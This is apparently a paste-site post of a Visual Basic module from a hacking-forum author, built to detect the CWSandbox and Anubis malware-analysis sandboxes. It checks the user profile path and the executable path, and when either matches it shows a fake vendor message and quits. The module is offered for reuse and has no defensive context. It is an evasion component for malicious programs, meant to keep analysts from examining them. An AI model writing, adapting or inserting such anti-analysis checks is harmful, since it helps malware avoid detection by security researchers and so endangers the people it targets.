Posted by h7labscom on Sun 8 Nov 17:23
report abuse | download | new post
- Attribute VB_Name = "Module1"
- '##############################################
- '# Anti CW Sandbox & Anubis Module #
- '# ------------------------------------- #
- '# Module by haZl0oh for Os-Gentlemen.6x.to #
- '# Shoutz to EvAriZzl , h0yt3r,Mastermaefju #
- '# Ic3drag0n and OS-Gentlemen.6x.to Staff #
- '# If u sue it gimme some shoutZ.... #
- '##############################################
- Public Sub cw_anub()
- ' Anti CW Sandbox
- '-------------------------
- If Environ("userprofile") = "H:/Documents and Settings/User" Then
- MsgBox "No emulation or Virtualisation of this application possible" & vbCrLf & "Please contact your Vendor for more information.", , "Vendor notification."
- End
- Else
- 'ANTI Anubis
- '--------------------
- If App.Path & App.EXEName & ".exe" = "C:\sample.exe" Then
- MsgBox "No emulation or Virtualisation of this application possible" & vbCrLf & "Please contact your Vendor for more information.", , "Vendor notification."
- End
- Else
- 'MsgBox "Success...."
- End If
- End If
- end sub
Submit a correction or amendment below (click here to make a fresh posting)
After submitting an amendment, you'll be able to view the differences between the old and new posts easily.